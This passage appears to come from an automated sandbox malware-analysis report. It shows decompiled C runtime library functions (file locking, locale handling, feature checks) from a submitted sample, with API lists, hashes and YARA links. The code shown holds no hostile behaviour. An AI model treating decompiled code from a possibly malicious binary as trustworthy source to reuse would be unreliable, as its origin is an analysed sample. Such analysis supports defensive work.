                                                                                                                                                                      • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                                      • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0242499F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __getptd.LIBCMT ref: 024249AB
                                                                                                                                                                        • Part of subcall function 0242099C: __getptd_noexit.LIBCMT ref: 0242099F
                                                                                                                                                                        • Part of subcall function 0242099C: __amsg_exit.LIBCMT ref: 024209AC
                                                                                                                                                                      • __getptd.LIBCMT ref: 024249C2
                                                                                                                                                                      • __amsg_exit.LIBCMT ref: 024249D0
                                                                                                                                                                      • __lock.LIBCMT ref: 024249E0
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401518261.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2410000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                      • String ID: @.B
                                                                                                                                                                      • API String ID: 3521780317-470711618
                                                                                                                                                                      • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                                      • Instruction ID: 13b4238d6c3b6f3eff2885397631cd0c9a1a23ebcfeb7cc82e63de5a3be4c14e
                                                                                                                                                                      • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                                      • Instruction Fuzzy Hash: 4BF06D31A40724DADB20BB77890575973A1BF04760F81015F8484B72D0CB64A845CE59
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 02424961 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ___addlocaleref.LIBCMT ref: 02424973
                                                                                                                                                                      • ___removelocaleref.LIBCMT ref: 0242497E
                                                                                                                                                                      • ___freetlocinfo.LIBCMT ref: 02424992
                                                                                                                                                                        • Part of subcall function 024246F0: ___free_lconv_mon.LIBCMT ref: 02424736
                                                                                                                                                                        • Part of subcall function 024246F0: ___free_lconv_num.LIBCMT ref: 02424757
                                                                                                                                                                        • Part of subcall function 024246F0: ___free_lc_time.LIBCMT ref: 024247DC
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401518261.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2410000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
                                                                                                                                                                      • String ID: @.B$@.B
                                                                                                                                                                      • API String ID: 4212647719-183327057
                                                                                                                                                                      • Opcode ID: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
                                                                                                                                                                      • Instruction ID: de376a183237e3b7bbbffbc7cbaca91d7d48e99d09b4647d2f80ea5a62047f1c
                                                                                                                                                                      • Opcode Fuzzy Hash: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
                                                                                                                                                                      • Instruction Fuzzy Hash: 49E02632521A3145CA352BBFB80036B9295EF82716BDB212FE808F7344DB64488CC4AC
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040C73D Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 77%
                                                                                                                                                                      			E0040C73D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t16;
				void* _t17;
				intOrPtr _t19;
				void* _t21;
				signed int _t22;
				intOrPtr* _t27;
				intOrPtr _t39;
				intOrPtr _t40;
				intOrPtr _t50;

				_t37 = __edx;
				_push(8);
				_push(0x421140);
				E0040E1D8(__ebx, __edi, __esi);
				_t39 = _a4;
				_t50 = _t39;
				_t51 = _t50 != 0;
				if(_t50 != 0) {
					E0040FB29(_t39);
					_v8 = 0;
					 *(_t39 + 0xc) =  *(_t39 + 0xc) & 0xffffffcf;
					_t16 = E0040FA20(__edx, _t39, _t39);
					__eflags = _t16 - 0xffffffff;
					if(_t16 == 0xffffffff) {
						L6:
						_t17 = 0x4227e0;
					} else {
						_t21 = E0040FA20(__edx, _t39, _t39);
						__eflags = _t21 - 0xfffffffe;
						if(_t21 == 0xfffffffe) {
							goto L6;
						} else {
							_t22 = E0040FA20(__edx, _t39, _t39);
							_t17 = ((E0040FA20(_t37, _t39, _t39) & 0x0000001f) << 6) +  *((intOrPtr*)(0x423f60 + (_t22 >> 5) * 4));
						}
					}
					_t9 = _t17 + 4; // 0xa80
					 *(_t17 + 4) =  *_t9 & 0x000000fd;
					_v8 = 0xfffffffe;
					E0040C735(_t39);
					_t19 = 0;
					__eflags = 0;
				} else {
					_t27 = E0040BFC1(_t51);
					_t40 = 0x16;
					 *_t27 = _t40;
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0040E744(__edx, _t40, 0);
					_t19 = _t40;
				}
				return E0040E21D(_t19);
			}













                                                                                                                                                                      0x0040c73d
                                                                                                                                                                      0x0040c690
                                                                                                                                                                      0x0040c692
                                                                                                                                                                      0x0040c697
                                                                                                                                                                      0x0040c69e
                                                                                                                                                                      0x0040c6a3
                                                                                                                                                                      0x0040c6a8
                                                                                                                                                                      0x0040c6aa
                                                                                                                                                                      0x0040c6c8
                                                                                                                                                                      0x0040c6ce
                                                                                                                                                                      0x0040c6d1
                                                                                                                                                                      0x0040c6d6
                                                                                                                                                                      0x0040c6dc
                                                                                                                                                                      0x0040c6df
                                                                                                                                                                      0x0040c70f
                                                                                                                                                                      0x0040c70f
                                                                                                                                                                      0x0040c6e1
                                                                                                                                                                      0x0040c6e2
                                                                                                                                                                      0x0040c6e8
                                                                                                                                                                      0x0040c6eb
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040c6ed
                                                                                                                                                                      0x0040c6ee
                                                                                                                                                                      0x0040c70b
                                                                                                                                                                      0x0040c70b
                                                                                                                                                                      0x0040c6eb
                                                                                                                                                                      0x0040c714
                                                                                                                                                                      0x0040c71b
                                                                                                                                                                      0x0040c71e
                                                                                                                                                                      0x0040c725
                                                                                                                                                                      0x0040c72a
                                                                                                                                                                      0x0040c72a
                                                                                                                                                                      0x0040c6ac
                                                                                                                                                                      0x0040c6ac
                                                                                                                                                                      0x0040c6b3
                                                                                                                                                                      0x0040c6b4
                                                                                                                                                                      0x0040c6b6
                                                                                                                                                                      0x0040c6b7
                                                                                                                                                                      0x0040c6b8
                                                                                                                                                                      0x0040c6b9
                                                                                                                                                                      0x0040c6ba
                                                                                                                                                                      0x0040c6bb
                                                                                                                                                                      0x0040c6c3
                                                                                                                                                                      0x0040c6c3
                                                                                                                                                                      0x0040c731

                                                                                                                                                                      APIs
                                                                                                                                                                      • __lock_file.LIBCMT ref: 0040C6C8
                                                                                                                                                                      • __fileno.LIBCMT ref: 0040C6D6
                                                                                                                                                                      • __fileno.LIBCMT ref: 0040C6E2
                                                                                                                                                                      • __fileno.LIBCMT ref: 0040C6EE
                                                                                                                                                                      • __fileno.LIBCMT ref: 0040C6FE
                                                                                                                                                                        • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                        • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.400990974.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2805327698-0
                                                                                                                                                                      • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                                      • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                                                                                                                      • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                                      • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00413FCC Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 89%
                                                                                                                                                                      			E00413FCC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x421490);
				E0040E1D8(__ebx, __edi, __esi);
				_t31 = E00410735(__ebx, __edx, __edi, _t35);
				_t15 =  *0x422e34; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E0040D6E0(_t25, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x422d38; // 0x2741608
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x422910;
								if(__eflags != 0) {
									_push(_t33);
									E0040B6B5(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x422d38; // 0x2741608
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x422d38; // 0x2741608
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00414067();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E0040E79A(_t29, _t31, 0x20);
				}
				return E0040E21D(_t33);
			}










                                                                                                                                                                      0x00413fcc
                                                                                                                                                                      0x00413fcc
                                                                                                                                                                      0x00413fcc
                                                                                                                                                                      0x00413fcc
                                                                                                                                                                      0x00413fce
                                                                                                                                                                      0x00413fd3
                                                                                                                                                                      0x00413fdd
                                                                                                                                                                      0x00413fdf
                                                                                                                                                                      0x00413fe7
                                                                                                                                                                      0x00414008
                                                                                                                                                                      0x0041400e
                                                                                                                                                                      0x00414012
                                                                                                                                                                      0x00414015
                                                                                                                                                                      0x00414018
                                                                                                                                                                      0x0041401e
                                                                                                                                                                      0x00414020
                                                                                                                                                                      0x00414022
                                                                                                                                                                      0x00414025
                                                                                                                                                                      0x0041402b
                                                                                                                                                                      0x0041402d
                                                                                                                                                                      0x0041402f
                                                                                                                                                                      0x00414035
                                                                                                                                                                      0x00414037
                                                                                                                                                                      0x00414038
                                                                                                                                                                      0x0041403d
                                                                                                                                                                      0x00414035
                                                                                                                                                                      0x0041402d
                                                                                                                                                                      0x0041403e
                                                                                                                                                                      0x00414043
                                                                                                                                                                      0x00414046
                                                                                                                                                                      0x0041404c
                                                                                                                                                                      0x00414050
                                                                                                                                                                      0x00414050
                                                                                                                                                                      0x00414056
                                                                                                                                                                      0x0041405d
                                                                                                                                                                      0x00413fef
                                                                                                                                                                      0x00413fef
                                                                                                                                                                      0x00413fef
                                                                                                                                                                      0x00413ff4
                                                                                                                                                                      0x00413ff8
                                                                                                                                                                      0x00413ffd
                                                                                                                                                                      0x00414005

                                                                                                                                                                      APIs
                                                                                                                                                                      • __getptd.LIBCMT ref: 00413FD8
                                                                                                                                                                        • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                                                        • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                                                      • __amsg_exit.LIBCMT ref: 00413FF8
                                                                                                                                                                      • __lock.LIBCMT ref: 00414008
                                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                                                                                                                      • InterlockedIncrement.KERNEL32(02741608), ref: 00414050
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.400990974.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4271482742-0
                                                                                                                                                                      • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                                      • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                                                                                                                                      • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                                      • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 02424233 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __getptd.LIBCMT ref: 0242423F
                                                                                                                                                                        • Part of subcall function 0242099C: __getptd_noexit.LIBCMT ref: 0242099F
                                                                                                                                                                        • Part of subcall function 0242099C: __amsg_exit.LIBCMT ref: 024209AC
                                                                                                                                                                      • __amsg_exit.LIBCMT ref: 0242425F
                                                                                                                                                                      • __lock.LIBCMT ref: 0242426F
                                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 0242428C
                                                                                                                                                                      • InterlockedIncrement.KERNEL32(00422D38), ref: 024242B7
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401518261.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2410000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4271482742-0
                                                                                                                                                                      • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                                      • Instruction ID: 8e32cceee5c6ccb3c3afd64e487eca2d2d536de40caa53bd949fc74ce13cbd85
                                                                                                                                                                      • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                                      • Instruction Fuzzy Hash: 8201C431A01630EBD721AB67D90575FB760EF447A4F81001BD810AB3D0C7746586CFE9
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 02421161 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401518261.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2410000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: $2$l
                                                                                                                                                                      • API String ID: 0-3132104027
                                                                                                                                                                      • Opcode ID: 93ec677eb6f37e13f038257329e2d2bc6cd763e678568b4eabc98800338fe0cb
                                                                                                                                                                      • Instruction ID: da2d4751ffefe3db32250bded5170a6db87446de7608690a9e31e5dd07319b60
                                                                                                                                                                      • Opcode Fuzzy Hash: 93ec677eb6f37e13f038257329e2d2bc6cd763e678568b4eabc98800338fe0cb
                                                                                                                                                                      • Instruction Fuzzy Hash: 0641A03484427C8EDF359A1788883F97BA2AB05319F9401CBC49DAA292C7754ACBCF05
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0241FCBF Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401518261.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2410000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __calloc_crt
                                                                                                                                                                      • String ID: P$B$`$B
                                                                                                                                                                      • API String ID: 3494438863-235554963
                                                                                                                                                                      • Opcode ID: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
                                                                                                                                                                      • Instruction ID: 4ba8cb4d2231d841f47bf5fb6ee2816f86ab9f40d65464c212794a8ae734247c
                                                                                                                                                                      • Opcode Fuzzy Hash: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
                                                                                                                                                                      • Instruction Fuzzy Hash: 95110A313087215BE7248F2DBC50B763392FB84328766423BE617CB7A4E774D4874A88
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00413610 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 65%
                                                                                                                                                                      			E00413610() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x41fb50;
					_v28 =  *0x41fb48;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}







                                                                                                                                                                      0x00413615
                                                                                                                                                                      0x0041361d
                                                                                                                                                                      0x00413634
                                                                                                                                                                      0x004135e0
                                                                                                                                                                      0x004135e9
                                                                                                                                                                      0x004135f5
                                                                                                                                                                      0x004135f8
                                                                                                                                                                      0x004135fb
                                                                                                                                                                      0x004135fd
                                                                                                                                                                      0x00413600
                                                                                                                                                                      0x00413605
                                                                                                                                                                      0x0041360f
                                                                                                                                                                      0x00413607
                                                                                                                                                                      0x0041360b
                                                                                                                                                                      0x0041360b
                                                                                                                                                                      0x0041361f
                                                                                                                                                                      0x00413625
                                                                                                                                                                      0x0041362d
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0041362f
                                                                                                                                                                      0x0041362f
                                                                                                                                                                      0x00413633
                                                                                                                                                                      0x00413633
                                                                                                                                                                      0x0041362d

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.400990974.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                      • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                                                      • API String ID: 1646373207-3105848591
                                                                                                                                                                      • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                                                      • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                                                                                                                      • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                                                      • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 02411B57 Relevance: 6.3, APIs: 5, Instructions: 77stringCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • lstrlen.KERNEL32(?), ref: 02411B6D
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 02411B96
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 02411BA7
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 02411BBF
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 02411BE7
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401518261.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2410000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3322701435-0
                                                                                                                                                                      • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                      • Instruction ID: 85d55f34898ad23c7651b8f5b593feda56b0d701451207b52a20974a9a8d3031
                                                                                                                                                                      • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                      • Instruction Fuzzy Hash: A211C4315003647BD3309715CC88F677F6CEB86BA9F048119FE5D9A281D721A804C6B4
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040C748 Relevance: 6.1, APIs: 4, Instructions: 148COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                                      			E0040C748(void* __edx, void* __esi, char _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t70;
				signed int _t71;
				intOrPtr _t73;
				signed int _t75;
				signed int _t81;
				char _t82;
				signed int _t84;
				intOrPtr* _t86;
				signed int _t87;
				intOrPtr* _t90;
				signed int _t92;
				signed int _t94;
				void* _t96;
				signed char _t98;
				signed int _t99;
				intOrPtr _t102;
				signed int _t103;
				intOrPtr* _t104;
				signed int _t111;
				signed int _t114;
				intOrPtr _t115;

				_t105 = __esi;
				_t97 = __edx;
				_t104 = _a4;
				_t87 = 0;
				_t121 = _t104;
				if(_t104 != 0) {
					_t70 = E0040FA20(__edx, _t104, _t104);
					__eflags =  *(_t104 + 4);
					_v8 = _t70;
					if(__eflags < 0) {
						 *(_t104 + 4) = 0;
					}
					_push(1);
					_push(_t87);
					_push(_t70);
					_t71 = E00411939(_t87, _t97, _t104, _t105, __eflags);
					__eflags = _t71 - _t87;
					_v12 = _t71;
					if(_t71 < _t87) {
						L2:
						return _t71 | 0xffffffff;
					} else {
						_t98 =  *(_t104 + 0xc);
						__eflags = _t98 & 0x00000108;
						if((_t98 & 0x00000108) != 0) {
							_t73 =  *_t104;
							_t92 =  *(_t104 + 8);
							_push(_t105);
							_v16 = _t73 - _t92;
							__eflags = _t98 & 0x00000003;
							if((_t98 & 0x00000003) == 0) {
								__eflags = _t98;
								if(__eflags < 0) {
									L15:
									__eflags = _v12 - _t87;
									if(_v12 != _t87) {
										__eflags =  *(_t104 + 0xc) & 0x00000001;
										if(( *(_t104 + 0xc) & 0x00000001) == 0) {
											L40:
											_t75 = _v16 + _v12;
											__eflags = _t75;
											L41:
											return _t75;
										}
										_t99 =  *(_t104 + 4);
										__eflags = _t99 - _t87;
										if(_t99 != _t87) {
											_t90 = 0x423f60 + (_v8 >> 5) * 4;
											_a4 = _t73 - _t92 + _t99;
											_t111 = (_v8 & 0x0000001f) << 6;
											__eflags =  *( *_t90 + _t111 + 4) & 0x00000080;
											if(__eflags == 0) {
												L39:
												_t66 =  &_v12;
												 *_t66 = _v12 - _a4;
												__eflags =  *_t66;
												goto L40;
											}
											_push(2);
											_push(0);
											_push(_v8);
											__eflags = E00411939(_t90, _t99, _t104, _t111, __eflags) - _v12;
											if(__eflags != 0) {
												_push(0);
												_push(_v12);
												_push(_v8);
												_t81 = E00411939(_t90, _t99, _t104, _t111, __eflags);
												__eflags = _t81;
												if(_t81 >= 0) {
													_t82 = 0x200;
													__eflags = _a4 - 0x200;
													if(_a4 > 0x200) {
														L35:
														_t82 =  *((intOrPtr*)(_t104 + 0x18));
														L36:
														_a4 = _t82;
														__eflags =  *( *_t90 + _t111 + 4) & 0x00000004;
														L37:
														if(__eflags != 0) {
															_t63 =  &_a4;
															 *_t63 = _a4 + 1;
															__eflags =  *_t63;
														}
														goto L39;
													}
													_t94 =  *(_t104 + 0xc);
													__eflags = _t94 & 0x00000008;
													if((_t94 & 0x00000008) == 0) {
														goto L35;
													}
													__eflags = _t94 & 0x00000400;
													if((_t94 & 0x00000400) == 0) {
														goto L36;
													}
													goto L35;
												}
												L31:
												_t75 = _t81 | 0xffffffff;
												goto L41;
											}
											_t84 =  *(_t104 + 8);
											_t96 = _a4 + _t84;
											while(1) {
												__eflags = _t84 - _t96;
												if(_t84 >= _t96) {
													break;
												}
												__eflags =  *_t84 - 0xa;
												if( *_t84 == 0xa) {
													_t44 =  &_a4;
													 *_t44 = _a4 + 1;
													__eflags =  *_t44;
												}
												_t84 = _t84 + 1;
												__eflags = _t84;
											}
											__eflags =  *(_t104 + 0xc) & 0x00002000;
											goto L37;
										}
										_v16 = _t87;
										goto L40;
									}
									_t75 = _v16;
									goto L41;
								}
								_t81 = E0040BFC1(__eflags);
								 *_t81 = 0x16;
								goto L31;
							}
							_t102 =  *((intOrPtr*)(0x423f60 + (_v8 >> 5) * 4));
							_t114 = (_v8 & 0x0000001f) << 6;
							__eflags =  *(_t102 + _t114 + 4) & 0x00000080;
							if(( *(_t102 + _t114 + 4) & 0x00000080) == 0) {
								goto L15;
							}
							_t103 = _t92;
